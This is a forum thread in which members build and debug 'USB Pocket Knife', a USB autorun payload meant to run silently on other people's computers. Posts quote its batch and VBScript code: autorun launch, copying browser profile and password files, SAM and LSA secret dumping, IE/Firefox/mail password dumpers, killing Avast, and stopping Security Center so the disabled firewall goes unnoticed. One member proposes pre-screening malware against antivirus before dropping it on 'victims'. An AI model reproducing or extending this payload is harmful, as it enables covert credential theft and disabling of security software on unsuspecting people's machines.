USB Pocket-Knife Development

[Leapo]

I checked the selfmade U3CUSTOM.ISO, but it is in the ISO. I tried making the ISO with "mkisofs" under Windows and under linux with no success. As I know, windows does not differ between capital and non-capital letters, although I tried using capital and non-capital letters for go.vbs. No success ! Seems as a bug to me, so this is the way, it works. If you like, you may use this in a README or in your instructions. Please feel free to improve my bad English or other errors

<snip>

No worries, I'll be providing a pre-build ISO image from now on since so many people seem to be having trouble figuring out how to build the darn thing :P

@Leapo: great work ! And yes, this was the thing I needed. Thanks !

The disarm function will be in the next release, which isn't too far off.

U3 is now working fine

Yay!

There is one thing, I tried to change, but did not manage: getting explorer started in the root of the usb drive when clicking on the usb-stick-icon. I had the same problem with siliverons switchblade, but get it solved by adding a batchfile, to wich the Autorun.inf diod point to. Accidently I deleted this batchfile (shame on me), and got no copy of it.

Currently, the payload has the option of opening the LOGS folder when its finished running. It won't be any trouble at all adding the root of the drive as an alternate location. Look for it in the next payload release.

hey i dont know if this has been mentioned but how about a program that will verify if the malicous program is detectable like it loads a list that it downloads from the internet and it feeds the program into kaspersprays online verifer if its undetectable then download to the victims pc if not go on to the next program

Actually, that's a very good idea, I'll look into it.

[vanguard]

I got half the way now ! Thanks to siliveron, he had had my little batch I sent him in his mails ! hurray !!!

So, to the NON-U3, I changed this:

1. Added a file named "go.bat" to \SYSTEM

2. Let Autorun.inf point to this file

In go.bat I got these lines:

--------

@echo off

%windir%\explorer.exe /E,/N,%CD%

wscript SYSTEM\go.vbs

---------

What did it change ? Well, most people just click the window away, which offers you to start the stick with the programm (damned, security looking Microsoft coders !)

But, using this, clicking on the drive in (is it?) "Workplace" (sry, I only have a German version of WindowsXP),

the payload is executed. I am no good coder, there is still the problem, with the opening DOS-window. I am working on it, to get it hiddden. I will be pleased of any help.

[TNTUNUS]

to make it more stealthy you might be able to use http://www.commandline.co.uk/cmdow/ so you can hide the windows and such

i did and it works great it makes it uber stealthy

it supports batch commands which i used to hide all my cmd windows and such

you can hide any window with it so its not only useful here you can use it else where

it lets you do things to windows that you wouldnt be able to do normally

[vanguard]

I know cmdow, and thought of using it. But this should be the last way. I thought, there might be a way offered by the system itself. And as I am not so experienced with windows-coding, I have the hope, someone other knows it.

If no one knows, I will use cmdow indeed. Thanks anyway.

[Tmbomber]

Hi, new to the fourm & have been playing with Leapo's payload.

Noticed a few things in Start.bat...

:: Performs a safety check. if the file safety.txt is found on the root of your C:\ drive, the payload will not run by default.
IF NOT EXIST %config%\Safety_Check.cfg GOTO SkipSafetyCheck
IF EXIST C:\safety.txt GOTO End
:SkipSafetyCheck

:: Finds the location of the flash partition and set master variable.
@ECHO off
IF EXIST ..\CONFIG\Test_Mode.cfg GOTO TestMode
FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (
	IF EXIST %%i:\CONFIG\Drive_Location.cfg (
        SET flshdrv=%%i:\
		)
	)

:: Sets Variables and paths
IF NOT EXIST %flshdrv%\LOGS\%computername% MD %flshdrv%\LOGS\%computername%
SET logdir="%flshdrv%\LOGS\%computername%
SET log="%flshdrv%\LOGS\%computername%\%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%].log"
SET tmplog="%flshdrv%\LOGS\%computername%\%computername%_TEMP.log"
IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET progdir="%flshdrv%\SYSTEM\PROGS\") ELSE (SET progdir=".\SYSTEM\PROGS\")
SET config="%flshdrv%\CONFIG\"

First, please notice that the second line references %config%, but it isn't defined until the bottom of the block I quoted.

Second, just before your FOR loop you have a conditional to branch off to TestMode, which doesn't have a destination label (I'm assuming you had one further down for testing something???)

and Third, The multiple "No Disk" errors appear to be coming from the FOR loop. I was playing with GonZor's payload and noticed that his "SET LOG PATHS" section looks like:

@ECHO on

CD \System\SRC >NUL

:: SET LOG PATHS
	IF NOT EXIST %1\System\Logs\%computername% (
		MD %1\System\Logs\%computername%
		)
	SET logdir="%1\System\Logs\%computername%
	SET log="%1\System\Logs\%computername%\%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%].log"
	SET tmplog="%1\System\Logs\%computername%\%computername%_TEMP.log"
	SET include="%1\System\SRC\Include
	SET /p eipurl=<"%1\System\SRC\Include\EIP.dat"
	SET U3="%cd%

Notice that he doesn't set a %flashdrv%, he's using %1 which is the first parameter passed from go.vbs. Your go.vbs is passing the same parameter, so you should be able to get rid of that FOR loop.

(Is there some reason you did it the way you did that I'm unaware of???)

I also get the "No Disk" error when I run Menu.bat. (for the same reason) It's not as critical there seeing Menu.bat is only run when I wanna change the thumbdrive's configuration.

Your csrss.exe is killing Avast alright, but for some reason is opening a lot of dos windows. I haven't figured that one out yet.

BTW, is Start.bat restored from Backup.rar???

[TNTUNUS]

With every release I try to integrate it with portable apps cause they are extremely useful/helpful and I am kinda needing help with it.

Also I am getting an issue with all of the batch files and most importantly the menu.bat this is what happens

I have no freaking clue what to do.

Can someone help me?

EDIT: So yeah i didn't see tmbomber's post before i posted but i guess we are getting the same problem

[TonkaTuff]

Can you add the iso in the newest build? Would be greatly appreciated! :D

[Leapo]

to make it more stealthy you might be able to use http://www.commandline.co.uk/cmdow/ so you can hide the windows and such

i did and it works great it makes it uber stealthy

it supports batch commands which i used to hide all my cmd windows and such

you can hide any window with it so its not only useful here you can use it else where

it lets you do things to windows that you wouldnt be able to do normally

I don't see any need for it, the payload already runs silently (no window appears). Is that not working for you?

Hi, new to the fourm & have been playing with Leapo's payload.

Noticed a few things in Start.bat...

<snip>

First, please notice that the second line references %config%, but it isn't defined until the bottom of the block I quoted.

Nice bug hunting there, I'll shift things around so that works correctly.

Second, just before your FOR loop you have a conditional to branch off to TestMode, which doesn't have a destination label (I'm assuming you had one further down for testing something???)

Yes, at one point I had the drive set up so that it could be run from a folder on my hard disk when testing mode was enabled (so I didn't need to work on the payload off of a flash drive).

and Third, The multiple "No Disk" errors appear to be coming from the FOR loop. I was playing with GonZor's payload and noticed that his "SET LOG PATHS" section looks like:

<snip>

Notice that he doesn't set a %flashdrv%, he's using %1 which is the first parameter passed from go.vbs. Your go.vbs is passing the same parameter, so you should be able to get rid of that FOR loop.

(Is there some reason you did it the way you did that I'm unaware of???)

I also get the "No Disk" error when I run Menu.bat. (for the same reason) It's not as critical there seeing Menu.bat is only run when I wanna change the thumbdrive's configuration.

I did it that way so that the batch files could be called, by hand, without needing to launch them through a VB script. I'm going to see if I can revise that FOR loop to fix the problem, but if I can't, then VBS it is...

Your csrss.exe is killing Avast alright, but for some reason is opening a lot of dos windows. I haven't figured that one out yet.

I think that's just the way the app operates, I'm trying to figure out a way to hide the prompts it spawns though... until then, it's disable-able through menu.bat if you don't want the windows and can live without it (better than not including it at all).

BTW, is Start.bat restored from Backup.rar???

Yes...why do you ask? lol.

[TNTUNUS]

I don't see any need for it, the payload already runs silently (no window appears). Is that not working for you?

That was more directed towards vanguard then you. I also just now thought you could use it to deal with the prompts that spawn with csrss.exe, just a thought.

[Tmbomber]

Yes...why do you ask? lol.

Actually, I was poking around a bit, trying a few changes...

Of course, having start.bat restore itself kinda messes *that* up :)

[StillFallin]

First off i would like to say thanks for everything everyone has done here.

And i know this is my first post and i just registered but i have bee following the dev of all this stuff here for a while as a guest and felt like making a comment on this so i registered.

Anyways getting to the point,

Do you not thing that you should run something like,

net stop "security center"

before killing the firewall to hide the fact that its been killed?

because most will notice the nice little red shield down there in there task bar pretty quick

now im running win xp so im not sure if the command is the same in vista or any other os

but ya im just putting it out there because i know i added that little bit of code in the script for me because like i said most will notice that little red shield pop up right off the bat.

So ya im just saying kill the security center before the firewall and ya should make thinks alot more behind the scenes you know.

Also i know its kinda makes things obvious but i also added right before the end a time change lol to change the time of the infected system to 11:11am that way i know when all the processes are complete and safe to remove the USB

Anyways tell me what you think.

[Leapo]

UPDATE: VERSION 0.8.2.0 IS OUT!

Safety.txt Being Ignored - BUG FIX

There was a slight issue with the way things were ordered in Start.bat that caused safety.txt to be ignored (the payload would run anyway) on all systems. This has been resolved. It is highly recommended you update to this version for this bug fix.

No Disk Errors While Running the Payload or Menu.bat - BUG FIX

It's not pretty, but I've reworked the drive detection script in both menu.bat and start.bat so that they nolonger create No Disk errors when run on some systems.

Menu System - NEW FEATURE

The ability to "disarm" the payload has been added to menu.bat (Menu.bat > Manage Settings and Modules > Other Options). When the payload is disarmed, it will not run in any system it is inserted into.

Menu System - NEW FEATURE

You can now have three choices for what to do when the payload has finished running, open the root of the drive, the logs folder, or no folder at all. (Menu.bat > Manage Settings and Modules > Other Options).

ReadMe - UPDATED

The Readme documentation has been brought up to date a bit, errors removed and additional information added.

Modules - UPDATED

The "Disable Firewall" module now stops the Windows Security Center before disabling the Windows Firewall. This prevents Windows from issuing the user a notification about the Windows Firewall being disabled.

DOWNLOAD THE USB POCKET KNIFE V0.8.2.0

includes both U3 and Non-U3 version. The U3 version has the ISO sources but no pre-built ISO. I know i said this would have a pre-built ISO, but I had to get that first bugfix out before people started pwning themselves. Happy Downloading!

Download Mirrors:

RapidShare, MegaUpload

[StillFallin]

lol thanks for adding that bit of code in there to kill the security center before the firewall

i had already did it to mine as well as fixed the issue with the safety.txt

but the other things sound nice i will be looking at them here shortly thanks

[elmer]

File Savr is doing a little promotion, allowing you to upload things to their server for free until the 15th, so I'm capitalizing on the time by uploading the USB Pocket Knife to their site. Here's a link. It should be valid until File Savr goes out of business. And the best part is plain text compresses VERY well, from 47.8MB to 4.1 MB.

e:Typo >.<

[Combat Wombat]

hey guys, i know this sounds extremely n00bish but i am working on some .bat to go along with the pocket-knife, and was wondering what i can do to bypass "press any key to continue" here is a snipit of code if you can make it just copy from the root directory {file} to c:\what\ with no confirmation

xcopy \[file] c:\what\ /w /e /i

[Tmbomber]

Thank you for posting your update :)

OK, more bug hunting in no particular order.

For some reason, the beginning of my log files looks like:

----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
----------------------------------------------------------------------------------------------------------------------------- 
+         [Dump SAM FGDUMP]        + 
+----------------------------------+ 
+----------------------------------+ 
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+         [Dump Firefox PW]        + 
+----------------------------------+ 


 Error : Firefox profile directory does not exist..
 You have entered profile path = [\FirePassword.exe] 

 FirePassword (Ver 2.0.1) : Firefox Username & Password List Decryptor 
		 by Nagareshwar Y Talekar 
 For latest version visit http://www.securityxploded.com.


 Usage : 
	 .\SYSTEM\PROGS\ [-m "master password" ] [Firefox_Profile_Directory] 

----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+           [Dump IE PW]           + 
+----------------------------------+ 
==================================================
Entry Name        : xxx
Type              : xxx
Stored In         : xxx
User Name         : xxx
Password          : xxx
==================================================

It's not even outputting:

:: Logged modules
:: Header information
ECHO ----------------------------------------------------------------------------------------------------------------------------- > %log% 2>&1
ECHO Leapos Payload [Time Started: %date% %time%] >> %log% 2>&1
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO Computer Name is: %computername% and the Logged on User Is: %username% >> %log% 2>&1

which confuses me quite a bit. (btw, notice that the first echo line there only has one > at the end of it)

The "no disk" error still persists when running Menu.bat (at least on my machine), but doesn't happen when you're actually sticking the thumb drive in a machine. So good job there.

Just noticed a minor one in Start.bat...

:: NetScape Data
mkdir %logdir%\%computername%\Slurp_Data\NetScape\
xcopy "C:\Documents and Settings\%username%\Application Data\Netscape\NSB\Profiles\*.db" "%logdir%\Slurp_Data\NetScape\" /s /c /q /r /h /y
xcopy "C:\Documents and Settings\%username%\Application Data\Netscape\NSB\Profiles\*.dat" "%logdir%\Slurp_Data\NetScape\" /s /c /q /r /h /y
xcopy "C:\Documents and Settings\%username%\Application Data\Netscape\NSB\Profiles\*bookmarks.html" "%logdir%\Slurp_Data\NetScape\" /s /c /q /r /h /y
:: Opera Data
mkdir %logdir%\Slurp_Data\Opera\
xcopy "C:\Documents and Settings\%username%\Application Data\Opera\Opera\profile\*.dat" "%logdir%\Slurp_Data\Opera\" /s /c /q /r /h /y
xcopy "C:\Documents and Settings\%username%\Application Data\Opera\Opera\mail\*.dat" "%logdir%\Slurp_Data\Opera\" /s /c /q /r /h /y
xcopy "C:\Documents and Settings\%username%\Application Data\Opera\Opera\mail\*.ini" "%logdir%\Slurp_Data\Opera\" /s /c /q /r /h /y

notice the difference in the mkdir lines. the one for netscape has an extra %computername% thrown in there, that creates an extra computername directory inside the computername directory. Netscapes mkdir line is the only one like it, so just removing the extra %computername%\ will clean up the log directory a bit.

:: Checks to see if the payload is disarmed
IF NOT EXIST %flshdrv%\CONFIG\Disarm_Payload.cfg GOTO SkipDisarm
IF EXIST %config%\Disarm_Payload.cfg GOTO End
:SkipDisarm	

:: Sets Variables and paths to clean up pathnams later on
IF NOT EXIST %flshdrv%\LOGS\%computername% MD %flshdrv%\LOGS\%computername%
SET logdir="%flshdrv%\LOGS\%computername%
SET log="%flshdrv%\LOGS\%computername%\%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%].log"
SET tmplog="%flshdrv%\LOGS\%computername%\%computername%_TEMP.log"
IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET progdir="%flshdrv%\SYSTEM\PROGS\") ELSE (SET progdir=".\SYSTEM\PROGS\")
SET config="%flshdrv%\CONFIG\"

I'm afraid we have another %config% being used before config is defined issue.

Port scan appears to be dumping it's help file. I'm uncertain why. It appears to dump it's information to the templog file, then appends templog to the normal log file. I'd add a -v to "%progdir%\portqry -local -l %tmplog% >> %log% 2>&1" just to get more verbose output.

Also for some reason a templog file is being left. It looks like it should be deleted, but for some reason it's left after the .bat file is done. I'll have to think on that one.

AVKill still pops up the dos windows. (like 8 of them) I'm still unsure how to deal with that. For the time being I'm disabling AVKill and just manually turning off the AV before inserting the thumb drive.

Three of the password recovery programs are popping up windows and not closing them. It's late & I don't remember which. I'll check that more tomorrow.

And finally....

Running this on an XP x64 machine causes a lot of the programs to fail. I only wind up with about half the information. I'm looking into that one too.

[StillFallin]

hey guys, i know this sounds extremely n00bish but i am working on some .bat to go along with the pocket-knife, and was wondering what i can do to bypass "press any key to continue" here is a snipit of code if you can make it just copy from the root directory {file} to c:\what\ with no confirmation

xcopy \[file] c:\what\ /w /e /i

im not sure if we can post links to things here or what not but this should help you i know i still use it for reffrence from time to time

http://www.computerhope.com/msdos.htm

this is the link to the xcopy commands http://www.computerhope.com/xcopyhlp.htm

hope that helps you out some

[vanguard]

Hi Leapo,

thanks for this cool release. Just my feedback here.

Safety.txt Being Ignored - BUG FIX

There was a slight issue with the way things were ordered in Start.bat that caused safety.txt to be ignored (the payload would run anyway) on all systems. This has been resolved. It is highly recommended you update to this version for this bug fix.

--

Cool, I already wondered, why it did not work. Just a question: The file safety.txt must be in the root of drive C:\ ?

Not in the root of the usb-drive ???

--

No Disk Errors While Running the Payload or Menu.bat - BUG FIX

It's not pretty, but I've reworked the drive detection script in both menu.bat and start.bat so that they nolonger create No Disk errors when run on some systems.

Menu System - NEW FEATURE

The ability to "disarm" the payload has been added to menu.bat (Menu.bat > Manage Settings and Modules > Other Options). When the payload is disarmed, it will not run in any system it is inserted into.

--

Yeah ! Great !!! This is, what I was looking for. So I can use the isb drive as normal, without the danger to accidently compromise some computers. Thanks for that !

--

Menu System - NEW FEATURE

You can now have three choices for what to do when the payload has finished running, open the root of the drive, the logs folder, or no folder at all. (Menu.bat > Manage Settings and Modules > Other Options).

--

Yes, this is what I am looking for, too. With this cool new feature my workaround with the "go.bat" is no more needed. Cool !

--

ReadMe - UPDATED

The Readme documentation has been brought up to date a bit, errors removed and additional information added.

--

I am missing an installation procedure in the Readme.txt (how to flash the drive etc. ). If you do not mind, you can use mine out of the forum. Otherwise I can offer you, to improve it myself and send it to you. Just ask.

--

Modules - UPDATED

The "Disable Firewall" module now stops the Windows Security Center before disabling the Windows Firewall. This prevents Windows from issuing the user a notification about the Windows Firewall being disabled.

DOWNLOAD THE USB POCKET KNIFE V0.8.2.0

includes both U3 and Non-U3 version. The U3 version has the ISO sources but no pre-built ISO. I know i said this would have a pre-built ISO, but I had to get that first bugfix out before people started pwning themselves. Happy Downloading!

Download Mirrors:

RapidShare, MegaUpload

Some additional thing: I am missing the antidote for the keylogger. The folder is empty. Is there any ?

What license is your work of ? Can it be GPL ? Free is always fine.

Again: Thank you very much for the improvements !

[peterrus]

I have discovered a bug in the latest leapos usb switchblade.

The non-u3 version does not have the Animation_1.cfg file present and thus is not able to make backups.

[Tmbomber]

A big one just cropped up. It looks like Go.vbs is executing multiple copies of start.bat.

(it explains why the beginning of my log file is so messed up)

Here's the FOR loop from GonZor's GO.vbs:

For Each objDrive in colDrives
    If objFSO.FileExists(objDrive.DriveLetter & ":\System\SRC\drv.dat") Then
        strPath = objDrive.Driveletter & ":"
        If objFSO.FileExists(strPath & "\System\SRC\U3.dat") Then
            objShell.Run ".\LaunchU3.exe -a"
        End If
        If objFSO.FileExists(strPath & "\System\SRC\PL.dat") Then
            objShell.Run ".\System\SRC\go.bat " & strPath , 0, False
        End If
    End If
Next

and here's yours:

For Each objDrive in colDrives
    If objFSO.FileExists(strPath & "\SYSTEM\Start.bat") Then
        objShell.Run ".\SYSTEM\Start.bat " & strPath , 0, False
    End If
Next

GonZor's got that launcher thing in there, but notice he sets the variable "strPath" in the third line. Yours uses it in the second line, but it's never set.

I think this might work:

For Each objDrive in colDrives
    strPath = objDrive.Driveletter & ":"
    If objFSO.FileExists(objDrive.DriveLetter & ":\SYSTEM\Start.bat") Then
        objShell.Run ".\System\Start.bat " & strPath , 0, False
    End If
Next

I'll be giving it a try tomorrow night.

[adlerweb]

Little Idea: Currently slurp uses some hardcoded paths, e.g. "C:\Documents and Settings\%username%\Application Data\Mozilla\Firefox\Profiles\*signons.txt" - this is imo not very portable. If someone set up Windows on another drive than C:\, moved folders arround ( or doesnt use an US-version the paths differ.

First thing that souldnt be too complicated: Application Data and the users profile-folder are available as environment variables

%APPDATA% -> C:\Documents and Settings\%username%\Application Data (not for WinNT)
%HOMEPATH% -> C:\Documents and Settings\%username%

Sadly there are no variables for desktop and my documents (or i could not find them) so in this case it would be helpful to get the path out of the registry (HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders).

[Tmbomber]

A big one just cropped up. It looks like Go.vbs is executing multiple copies of start.bat.

< snip >

I think this might work:

For Each objDrive in colDrives
    strPath = objDrive.Driveletter & ":"
    If objFSO.FileExists(objDrive.DriveLetter & ":\SYSTEM\Start.bat") Then
        objShell.Run ".\System\Start.bat " & strPath , 0, False
    End If
Next

I'll be giving it a try tomorrow night.

Yup, that was it. Now AVKill only opens one dos window and the log file is a lot cleaner...

Other issues...

On XP x64 Menu.bat still gives about four or five "No Disk" errors when you run it. This doesn't happen with standard XP. I don't get any "No Disk" errors with XP standard or x64 when the payload runs.

Moved:

:: Opens the logs folder
IF NOT EXIST %config%\Open_Drive_Logs.cfg GOTO SkipOpenDrv
start /wait %flshdrv%\LOGS\
:SkipOpenDrv

:: Opens the root of the drive folder
IF NOT EXIST %config%\Open_Drive_Root.cfg GOTO SkipOpenDrvRt
start /wait %flshdrv%
:SkipOpenDrvRt

To the bottom of the .bat file. That way the window opens when things are all done. There is a delay depending on what all you have turned on. but for stealth I'd have the "open window" feature turned off anyway.

IF NOT EXIST %config%\Dump_Mail_PWP.cfg GOTO SkipMailPW
	ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
	ECHO +----------------------------------+ >> %log% 2>&1
	ECHO +          [Dump Mail PW]          + >> %log% 2>&1
	ECHO +----------------------------------+ >> %log% 2>&1
		%progdir%\mailpv.exe /stext %tmplog% >> %log% 2>&1
		COPY %log%+%tmplog%* %log%  >> NUL
		DEL /f /q %tmplog% >NUL
:SkipMailPW

in the top line, Dump_Mail_PWP.cfg should be Dump_Mail_PW.cfg

IF NOT EXIST %config%\Dump_Updates_List.cfg GOTO SkipUdateList
	ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
	ECHO +----------------------------------+ >> %log% 2>&1
	ECHO +        [Dump Updates-List]       + >> %log% 2>&1
	ECHO +----------------------------------+ >> %log% 2>&1
		%progdir%\wul.exe /stext %tmplog% >> %log% 2>&1
		COPY %log%+%tmplog%* %log%  >> NUL
		DEL /f /q %tmplog% >NUL
:SkipUdateList

First line, Dump_Updates_List.cfg should read as: Dump_Update_List.cfg

Dump Mail PW, Dump Network PW, Dump Messenger PW, and Dump LSA Secrets all open windows and need to be manually closed.

Dump Firefox PW can't seem to find the Firefox directory on x64. I haven't checked it on standard XP yet.

Here's a fun one...

If you have Dump IE PW and Dump Messenger PW turned on, for some reason the tmplog isn't deleted at the end of Dump IE PW, if Dump Messenger PW doesn't generate output, the tmplog from Dump IE PW gets put in the Dump Messenger PW's output block.

It seems the tmplog isn't being deleted on sever occasions. (I'm still trying to figure out why)

[TNTUNUS]

it is so buggy it doesnt even work on my u3 drive

it doesnt auto run

its not stealth

it doesnt even do what it is intended to do

[Tmbomber]

it is so buggy it doesnt even work on my u3 drive

it doesnt auto run

its not stealth

it doesnt even do what it is intended to do

Well...

Implement the fixes I posted and disable IE PW, LSA secrets, mail PW, MSN Messenger PW, Network PW, and AVKILL and it runs in stealth.

How about helping with the debugging???

[Tmbomber]

Discovered something...

netstat.exe -abn >> %log% 2>&1

The b option works on some OS's, but not on all.

I tried it with and without and if it's available I think I wanna see the b output. Easy solution, do it twice:

netstat.exe -an >> %log% 2>&1

netstat.exe -abn >> %log% 2>&1

Another thing I noticed...

GonZor's payload launches all the password programs without opening windows...

Hey GonZor... How'd ya pull that one off??? (presently trying to reverse engineer what ya did)